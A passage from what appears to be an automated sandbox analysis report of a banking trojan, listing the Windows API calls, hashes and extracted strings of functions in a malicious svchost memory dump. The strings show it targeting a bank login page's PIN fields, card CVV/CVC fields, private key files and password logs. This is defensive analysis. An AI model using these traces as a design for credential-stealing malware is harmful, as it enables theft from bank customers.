                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a2c5), ref: 0266216B
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02662180
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0266218A
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02662192
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 026621A3
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 026621AA
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 026621E2
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 026621EF
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a2c5,?,?), ref: 02662237
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$Backslash$ErrorFileLast$AdminAttributesCreateDeleteDirectoryFolderMakeSystemUsermemset
                                                                                                                                                                                                              • String ID: 8a99a2c5$keys.zip$path.txt
                                                                                                                                                                                                              • API String ID: 1668326001-1989694494
                                                                                                                                                                                                              • Opcode ID: 89ade1819320593081621fd09c5ac8f03db6165053e0803473a52f68befaba0e
                                                                                                                                                                                                              • Instruction ID: d64f0e976925c9cce7b587b65f8d2ac45c985aa5870affeb4362d283d07aec9d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89ade1819320593081621fd09c5ac8f03db6165053e0803473a52f68befaba0e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E711830940345AFDB219B789CACBFE7BE8AF45704F558694EA86D7340DF709584CB90
                                                                                                                                                                                                              Function 0264AAF0 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 267COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: open$taskmgr
                                                                                                                                                                                                              • API String ID: 0-1543563666
                                                                                                                                                                                                              • Opcode ID: 7bb2fabdc2341fdef63f8ef9bb1d2063e70b2419e4ab7f13c9244239c5c4a0a5
                                                                                                                                                                                                              • Instruction ID: fd9240749b5b7a51fdc7dad568a71606df9c46b5b86a1a1ae6aab67b442fd404
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7bb2fabdc2341fdef63f8ef9bb1d2063e70b2419e4ab7f13c9244239c5c4a0a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A910875A80204FBD710DFA4EC98EAE77ACEB49316F505619F946A7381CF319C91CBA0
                                                                                                                                                                                                              Function 02661A60 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 185stringsynchronizationsleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02661A83
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02661A92
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02661AA1
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D4A8), ref: 02661ACD
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D4A8), ref: 02661B03
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02661B6C
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02661B76
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02661B7E
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02661B8F
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02661B96
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02661BA3
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214},00000000,00000001), ref: 02661BCD
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02661BF2
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,00000000,02658A50), ref: 02661C0F
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214},00000006,00000010,00000000,00000000,00000000,00000000), ref: 02661C29
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 02661C33
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 02661C3E
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02661C45
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02661C53
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02661C64
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$DescriptorPathstrstr$BackslashCreateDirectoryErrorHandleLastMutex$AdminCloseConvertCurrentFolderFreeInfoInformationLocalMakeNamedReleaseSaclSleepStringSystemUser
                                                                                                                                                                                                              • String ID: &txtPin=$&txtSubId=$Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}$S:(ML;;NRNWNX;;;LW)$ebank.laiki.com$pass.txt
                                                                                                                                                                                                              • API String ID: 532458909-2725162336
                                                                                                                                                                                                              • Opcode ID: 604835e15a94beb2c82f607da1916d1f44220ececf2cde0549a4695aff2af006
                                                                                                                                                                                                              • Instruction ID: cce2a7ca57a6b5c946cb709d73a6099cdc5c7f7574022d75fa7610a526be2604
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 604835e15a94beb2c82f607da1916d1f44220ececf2cde0549a4695aff2af006
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12511531A40209ABDB119F789CA8BFF7BA9AF46740F044699F94AD7300EF71994487E1
                                                                                                                                                                                                              Function 0265F030 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 217filethreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,prv_key.pfx), ref: 0265F05D
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A7A5), ref: 0265F09E
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A7A5), ref: 0265F0D2
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 0265F0E7
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0265F0F1
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265F0F9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0265F10A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0265F111
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 0265F14B
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0265F158
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A7A5,0268FDB8,0268FDB9), ref: 0265F199
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 0265F1D4
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0265F1DE
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265F1E6
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0265F1F7
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0265F1FE
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 0265F23B
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0265F248
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0265F420,0268FDB8,00000000,00000000), ref: 0265F27E
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0265F296
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265F2A7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$ErrorFileLast$BackslashCreate$AdminAttributesDeleteDirectoryFolderHandleMakeSystemUser$CloseInformationThread
                                                                                                                                                                                                              • String ID: 8A99A7A5$pass.log$path.txt$prv_key.pfx
                                                                                                                                                                                                              • API String ID: 448721894-1507822802
                                                                                                                                                                                                              • Opcode ID: 419269654285250932b426ce7783b50d8443e5936ce2ab956e244a5d6009dec0
                                                                                                                                                                                                              • Instruction ID: 885594f98bdcd6b1b88141c418933762c38dd9e70ea8ebfa33bbda99cd642fa0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 419269654285250932b426ce7783b50d8443e5936ce2ab956e244a5d6009dec0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E712835A40215AFDB118F78DC98BEE7BE8AF4A300F548A94ED86D7340DB70C985CB90
                                                                                                                                                                                                              Function 0265D26C Relevance: 42.3, APIs: 17, Strings: 7, Instructions: 259fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 0265D278
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,found.), ref: 0265D293
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,asus), ref: 0265D2AE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A689), ref: 0265D2D4
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 0265D30E
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0265D318
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265D320
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0265D32F
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0265D336
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A689,?,?), ref: 0265D3D9
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 0265D413
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0265D41D
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265D425
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0265D434
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0265D43B
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 0265D52F
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(?), ref: 0265D563
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Error$LastPath$AdminBackslashCreateDirectoryFileFolderMakeSystemUser$AttributesFindModeNext
                                                                                                                                                                                                              • String ID: .txt$.zip$8A99A689$asus$found.$keys$path
                                                                                                                                                                                                              • API String ID: 2233314381-1567219237
                                                                                                                                                                                                              • Opcode ID: dacdc943aa9f3d47e43bcb14fe6c3b4437d4f43d83b443aa2bdae4db16caf700
                                                                                                                                                                                                              • Instruction ID: 0c25591d0bf5f248b84414b6c296625bdf682e271089629bbd42aef24e924df7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dacdc943aa9f3d47e43bcb14fe6c3b4437d4f43d83b443aa2bdae4db16caf700
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2491D1305087569FCB16CB3498686BBBBE5EF8A348F488A59ECC6C7340EB31D549C791
                                                                                                                                                                                                              Function 02664018 Relevance: 38.8, APIs: 17, Strings: 5, Instructions: 313COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D19C), ref: 02664037
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02664075
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0266407F
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02664087
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02664098
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0266409F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,?), ref: 026640FD
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 0266410C
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D19C), ref: 02664137
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02664197
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D19C,?,00000000), ref: 026641D7
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02664237
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D19C), ref: 02664297
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$Backslash$ErrorLast_snprintf$AdminAttributesCreateDirectoryFileFolderMakeSystemUser
                                                                                                                                                                                                              • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$keys%i.zip$keys.zip$path%i.txt$path.txt
                                                                                                                                                                                                              • API String ID: 2433436401-604994656
                                                                                                                                                                                                              • Opcode ID: 06228bc8786fb8bdb0b219f5ac0fd007ad4e06701bf1b016ee49c69a4e950dc6
                                                                                                                                                                                                              • Instruction ID: a5d072744e9c14fec9cfac91b5e945b3dbcbbf2bae0832fce28ebed1445ac745
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 06228bc8786fb8bdb0b219f5ac0fd007ad4e06701bf1b016ee49c69a4e950dc6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03B1FB319006495BDF2ADB7898AC7FE7BE5BF49300F144AA8D996D7340EF719988CB40
                                                                                                                                                                                                              Function 0264DA20 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 192filesynchronizationmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0264DA2D
                                                                                                                                                                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 0264DA3E
                                                                                                                                                                                                                • Part of subcall function 0264D970: GetComputerNameA.KERNEL32(0268F588,?), ref: 0264D987
                                                                                                                                                                                                                • Part of subcall function 0264D970: lstrlenA.KERNEL32(0268F588,?,?,026576EC), ref: 0264D992
                                                                                                                                                                                                                • Part of subcall function 0264D970: wsprintfA.USER32 ref: 0264D9D2
                                                                                                                                                                                                                • Part of subcall function 0264D970: wsprintfA.USER32 ref: 0264D9E2
                                                                                                                                                                                                                • Part of subcall function 0264D970: wsprintfA.USER32 ref: 0264D9F2
                                                                                                                                                                                                                • Part of subcall function 0264D970: wsprintfA.USER32 ref: 0264D9FF
                                                                                                                                                                                                                • Part of subcall function 0264D970: wsprintfA.USER32 ref: 0264DA0C
                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,0268F5A0), ref: 0264DA6A
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0264DA83
                                                                                                                                                                                                                • Part of subcall function 02649020: SetThreadDesktop.USER32(?,76F8F590,76F816B0,?), ref: 0264902F
                                                                                                                                                                                                                • Part of subcall function 02649020: GetDC.USER32(00000000), ref: 02649037
                                                                                                                                                                                                                • Part of subcall function 02649020: GetDeviceCaps.GDI32(00000000,0000000A), ref: 02649048
                                                                                                                                                                                                                • Part of subcall function 02649020: GetDeviceCaps.GDI32(00000000,00000008), ref: 02649059
                                                                                                                                                                                                                • Part of subcall function 02649020: CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02649070
                                                                                                                                                                                                                • Part of subcall function 02649020: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 026490B2
                                                                                                                                                                                                                • Part of subcall function 02649020: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 026490C2
                                                                                                                                                                                                                • Part of subcall function 02649020: DeleteObject.GDI32(00000000), ref: 026490C5
                                                                                                                                                                                                                • Part of subcall function 02649020: ReleaseDC.USER32(00000000,00000000), ref: 026490CE
                                                                                                                                                                                                                • Part of subcall function 02649020: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02649129
                                                                                                                                                                                                              • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,0268F54C), ref: 0264DAB0
                                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0264DAC3
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,0268F670), ref: 0264DAE1
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 0264DAFF
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?), ref: 0264DB20
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(0268F670,00000006,00000010,00000000,00000000,00000000,00000000), ref: 0264DB3D
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 0264DB47
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0264DB61
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,0268F630), ref: 0264DB79
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 0264DB97
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00000000,?), ref: 0264DBB8
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(0268F630,00000006,00000010,00000000,00000000,00000000,00000000), ref: 0264DBD5
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 0264DBDF
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0264DBFD
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0264DC10
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0264DC23
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,0268F5DC), ref: 0264DC39
                                                                                                                                                                                                                • Part of subcall function 02665930: GetCurrentThread.KERNEL32 ref: 02665940
                                                                                                                                                                                                                • Part of subcall function 02665930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02654D1B,?,?,00000000), ref: 02665947
                                                                                                                                                                                                                • Part of subcall function 02665930: GetCurrentProcess.KERNEL32(00000020,02654D1B,?,?,?,?,02654D1B,?,?,00000000), ref: 02665957
                                                                                                                                                                                                                • Part of subcall function 02665930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02654D1B,?,?,00000000), ref: 0266595E
                                                                                                                                                                                                                • Part of subcall function 02665930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02665981
                                                                                                                                                                                                                • Part of subcall function 02665930: AdjustTokenPrivileges.KERNELBASE(02654D1B,00000000,00000001,00000000,00000000,00000000), ref: 0266599B
                                                                                                                                                                                                                • Part of subcall function 02665930: GetLastError.KERNEL32 ref: 026659A5
                                                                                                                                                                                                                • Part of subcall function 02665930: CloseHandle.KERNEL32(02654D1B), ref: 026659B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create$Security$Descriptor$wsprintf$EventFile$FreeMutexThreadToken$BitsCapsConvertCurrentDeviceHeapInfoLocalMappingNamedOpenProcessSaclStringView$AdjustBitmapCloseCompatibleComputerCountDeleteDesktopErrorHandleLastLookupNameObjectPrivilegePrivilegesReleaseTickValuelstrlen
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 3555772620-820036962
                                                                                                                                                                                                              • Opcode ID: f9c4a99f08fc3f10bc6f2bb8d88a7023e025781ee64e438bb6ffbde84442493f
                                                                                                                                                                                                              • Instruction ID: 36cbea358f2e01ef7e69d43f12077b6dc1f7cf0e3673286093dd9facc293ed3a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f9c4a99f08fc3f10bc6f2bb8d88a7023e025781ee64e438bb6ffbde84442493f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D517EB0FC0305BAF720AFA59C46FAD77A8AB44F00F504615B601BA2C0DBF0A5508FA5
                                                                                                                                                                                                              Function 0265E3F0 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 145memorystringthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvv=,00000000,76F8F380,00000000,00000001,00000000,?,?,?,02658A44,?,?,?,?,?), ref: 0265E433
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvv=&,?,?,02658A44,?,?,?,?,?,?), ref: 0265E441
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvv2=,?,?,02658A44,?,?,?,?,?,?), ref: 0265E44D
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvv2=&,?,?,02658A44,?,?,?,?,?,?), ref: 0265E45B
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvc=,?,?,02658A44,?,?,?,?,?,?), ref: 0265E467
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&cvc=&,?,?,02658A44,?,?,?,?,?,?), ref: 0265E479
                                                                                                                                                                                                              • strstr.MSVCRT ref: 0265E48F
                                                                                                                                                                                                              • strstr.MSVCRT ref: 0265E4A2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000011,?,?,?,?,?,?,?,?,?,?), ref: 0265E50B
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 0265E512
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265E522
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,0265E580,00000000,00000000,00000000), ref: 0265E548
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0265E560
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265E571
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleHeapstrstr$AllocCloseCreateInformationProcessThreadmemset
                                                                                                                                                                                                              • String ID: &cvc=$&cvc=&$&cvv2=$&cvv2=&$&cvv=$&cvv=&$&domain=letitbit.net&
                                                                                                                                                                                                              • API String ID: 1632825432-2817208116
                                                                                                                                                                                                              • Opcode ID: c9b7352e2bcda20077d46148d0de5726069fd37acc71a740e41d00df430746d7
                                                                                                                                                                                                              • Instruction ID: 8684538aa706bf18823abab653bf40da5d82fe13cb3312f503d14c04adb9f0cf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9b7352e2bcda20077d46148d0de5726069fd37acc71a740e41d00df430746d7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D414632A407216BEB220E786CA9FAE37994F45785F698310EC4197341FF77DB1182A9
                                                                                                                                                                                                              Function 02659B20 Relevance: 36.3, APIs: 24, Instructions: 271networkmemorythreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0000000C), ref: 02659B39
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02659B42
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0000000C), ref: 02659B4C
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02659B4F
                                                                                                                                                                                                              • recv.WS2_32(?,?,?,00000000), ref: 02659B75
                                                                                                                                                                                                              • send.WS2_32(?,02689E4C,00000002,00000000), ref: 02659BCC
                                                                                                                                                                                                              • send.WS2_32(?,0268E1CC,00000002,00000000), ref: 02659BF2
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000004,00000000), ref: 02659C18
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000001,00000000), ref: 02659C92
                                                                                                                                                                                                              • gethostbyname.WS2_32(00000005), ref: 02659CC7
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000002,00000000), ref: 02659D0D
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000004,00000000), ref: 02659D24
                                                                                                                                                                                                              • inet_ntoa.WS2_32(?), ref: 02659D37
